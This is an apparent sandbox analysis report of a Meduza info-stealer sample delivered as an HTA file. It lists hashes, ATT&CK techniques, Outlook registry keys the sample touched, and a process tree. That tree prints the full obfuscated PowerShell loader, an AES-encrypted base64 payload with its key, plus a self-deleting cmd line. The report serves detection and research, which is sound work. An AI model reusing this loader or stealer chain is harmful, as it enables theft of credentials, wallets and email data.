meduza | 0084b13cb5945c1da5e3ab7127d81a918605a9a997b7bec4e38462d5c20b390c

General

Target

hope1.hta
Size

68KB
MD5

c848d6d7525cdef8a88a2633dd587bd9
SHA1

879cfec7388812fbb3b6ea5d0ef70a1208c69049
SHA256

0084b13cb5945c1da5e3ab7127d81a918605a9a997b7bec4e38462d5c20b390c
SHA512

42c956388fad9a4449e49c35efc916bf1ca2182a941147bd14a478d242983c2cf387f575c351920e12be3a9b5899e09b988b48670281052f925ab9a76e3f8990
SSDEEP

768:5GAFjsExaJ1TWybaoQQRFJGwPop2NwDc7k0sS7:IbqaJhbTQXZc7uS7

Score

10^/10

meduza collection discovery spyware stealer

Malware Config

Signatures

Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Mejesusa.exe	family_meduza

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 640 powershell.exe
Downloads MZ/PE file

flow	pid	process
15	640	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeMejesusa.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	Mejesusa.exe

Executes dropped EXE 1 IoCs

Processes:

Mejesusa.exe

pid process

1432 Mejesusa.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1432	Mejesusa.exe

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

Processes:

Mejesusa.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

21 api.ipify.org
22 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1472 PING.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exeMejesusa.exe

pid process

1152 powershell.exe
1152 powershell.exe
640 powershell.exe
640 powershell.exe
1432 Mejesusa.exe
1432 Mejesusa.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1152 powershell.exe
Token: SeDebugPrivilege 640 powershell.exe

flow	ioc
21	api.ipify.org
22	api.ipify.org

pid	process
1472	PING.EXE

pid	process
1152	powershell.exe
1152	powershell.exe
640	powershell.exe
640	powershell.exe
1432	Mejesusa.exe
1432	Mejesusa.exe

description	pid	process
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

mshta.exepowershell.exepowershell.exeMejesusa.execmd.exe

description	pid	process	target process
PID 1516 wrote to memory of 1152	1516	mshta.exe	powershell.exe
PID 1516 wrote to memory of 1152	1516	mshta.exe	powershell.exe
PID 1516 wrote to memory of 1152	1516	mshta.exe	powershell.exe
PID 1152 wrote to memory of 640	1152	powershell.exe	powershell.exe
PID 1152 wrote to memory of 640	1152	powershell.exe	powershell.exe
PID 1152 wrote to memory of 640	1152	powershell.exe	powershell.exe
PID 640 wrote to memory of 1432	640	powershell.exe	Mejesusa.exe
PID 640 wrote to memory of 1432	640	powershell.exe	Mejesusa.exe
PID 1432 wrote to memory of 1692	1432	Mejesusa.exe	cmd.exe
PID 1432 wrote to memory of 1692	1432	Mejesusa.exe	cmd.exe
PID 1692 wrote to memory of 1472	1692	cmd.exe	PING.EXE
PID 1692 wrote to memory of 1472	1692	cmd.exe	PING.EXE

outlook_office_path 1 IoCs

Processes:

Mejesusa.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe

outlook_win_path 1 IoCs

Processes:

Mejesusa.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Mejesusa.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\hope1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $MPABbJW = 'AAAAAAAAAAAAAAAAAAAAAP9xiqyHIpai2gqHPv7jHwt32MmWS/7yqPi90oWNMxbLMo1nobF5j6ElP7UlaveZHcq6JVEPg5zVhvE//5WdJosqpVjbK07uZMGUU8U3c4mfVNqCBVBi4t8wNu9CyENgoPdUqRBJ4CUqtab5w5YBUgiGSU+rXr1Qf5AOGI4WNHFij4S0nQrSeHchNS1xIqPN3CoikINUQUHHjnl8UcV8VQR7J1AAiXjLuh1ClcEp2bUXbGLVE//4k+wO2W6OEdtHBNhjG7Fg83S8x8O5Ic2wSl5Sx9k23DJVkIgsdeZNAXhll7OtsXM2NE155Ru+AO2VrhwmBe8JRFSA8/CgG3A9eEw7GwQUY2X9BjOx4QbQj7Kiwksq4NtHESSVYj2L08TVpTw1v22TyylLnyuRESwvAoyJ4mm99ZtdXu69+UxD+wksMjcTau1jqrHRk6NJzCRKMrPs2UpSwJF7ilCxd2zJJpP/LzVia7iYZw76zBg1ru6mghLwQn3SWbTpLjPu5yiu5FSDuinsvX6v+tEMODKCId3zDIqcSbDMiMGyn6ermJIsQ3aAriemnldHTHqfy+YT53nLdG+pWKpNqJYIHdX5Ez8/Q7ryvmy1wU/yW7LFqL5bq8QKCgeUxjMKswz7Ti06+Ynt+Vkqp8hZfHejsLrTM3E=';$pdkuCTF = 'c0NxRVdaTHJablNTcHVBdUdCVEp0V3lKa05VcXJnQnI=';$XhTUGzWr = New-Object 'System.Security.Cryptography.AesManaged';$XhTUGzWr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XhTUGzWr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XhTUGzWr.BlockSize = 128;$XhTUGzWr.KeySize = 256;$XhTUGzWr.Key = [System.Convert]::FromBase64String($pdkuCTF);$KLgVQ = [System.Convert]::FromBase64String($MPABbJW);$QuXZbStl = $KLgVQ[0..15];$XhTUGzWr.IV = $QuXZbStl;$BKtCdAPSi = $XhTUGzWr.CreateDecryptor();$ybMDeHcED = $BKtCdAPSi.TransformFinalBlock($KLgVQ, 16, $KLgVQ.Length - 16);$XhTUGzWr.Dispose();$FeBhDwr = New-Object System.IO.MemoryStream( , $ybMDeHcED );$jjIRc = New-Object System.IO.MemoryStream;$JErqZVtVy = New-Object System.IO.Compression.GzipStream $FeBhDwr, ([IO.Compression.CompressionMode]::Decompress);$JErqZVtVy.CopyTo( $jjIRc );$JErqZVtVy.Close();$FeBhDwr.Close();[byte[]] $XRAmHXK = $jjIRc.ToArray();$nmnuV = [System.Text.Encoding]::UTF8.GetString($XRAmHXK);$nmnuV | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:640
  - - C:\Users\Admin\AppData\Roaming\Mejesusa.exe
      "C:\Users\Admin\AppData\Roaming\Mejesusa.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      outlook_office_path
      outlook_win_path
      PID:1432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\Mejesusa.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1692
      - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        6⤵
        Runs ping.exe
        
        PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c580727fc0a7a733ea6a446b67ca63f7

SHA1
ebdd57fca25df0f759dec07c5382d560df7600c2

SHA256
369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073

SHA512
2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxu4lwun.2pq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mejesusa.exe

Filesize
907KB

MD5
a3d57207718a17b34a07438c9dadd34a

SHA1
e610cd61916e68f0d018e8dc89b051b2e0dd88fa

SHA256
28f08075554d51a59cb56805c6e1e9923b2a2950a9f75e72a6071fd825eece01

SHA512
16f271b7bb06c4f7a0e3b8c07647e547b189fe5b018ef939b3a005a549b1563524f60e21115565237aa3d42019d6772e69956bbf09a4d1c1dd16bac81875b4c6

Download Submit
memory/640-33-0x00000000073F0000-0x0000000007434000-memory.dmp

Filesize
272KB

Download
memory/640-37-0x00000000088B0000-0x0000000008E54000-memory.dmp

Filesize
5.6MB

Download
memory/640-36-0x0000000007720000-0x0000000007742000-memory.dmp

Filesize
136KB

Download
memory/640-35-0x0000000007800000-0x0000000007896000-memory.dmp

Filesize
600KB

Download
memory/640-34-0x0000000007580000-0x00000000075F6000-memory.dmp

Filesize
472KB

Download
memory/1152-13-0x0000000005430000-0x0000000005496000-memory.dmp

Filesize
408KB

Download
memory/1152-14-0x0000000005510000-0x0000000005576000-memory.dmp

Filesize
408KB

Download
memory/1152-20-0x0000000005B00000-0x0000000005B1E000-memory.dmp

Filesize
120KB

Download
memory/1152-21-0x0000000005B30000-0x0000000005B7C000-memory.dmp

Filesize
304KB

Download
memory/1152-22-0x0000000007420000-0x0000000007A9A000-memory.dmp

Filesize
6.5MB

Download
memory/1152-23-0x0000000006020000-0x000000000603A000-memory.dmp

Filesize
104KB

Download
memory/1152-7-0x0000000005390000-0x00000000053B2000-memory.dmp

Filesize
136KB

Download
memory/1152-19-0x0000000005680000-0x00000000059D4000-memory.dmp

Filesize
3.3MB

Download
memory/1152-2-0x0000000002660000-0x0000000002696000-memory.dmp

Filesize
216KB

Download
memory/1152-6-0x0000000004D30000-0x0000000005358000-memory.dmp

Filesize
6.2MB

Download
memory/1152-4-0x0000000002280000-0x0000000002290000-memory.dmp

Filesize
64KB

Download
memory/1152-5-0x0000000002280000-0x0000000002290000-memory.dmp

Filesize
64KB

Download
memory/1152-3-0x0000000074380000-0x0000000074B30000-memory.dmp

Filesize
7.7MB

Download
memory/1152-50-0x0000000074380000-0x0000000074B30000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads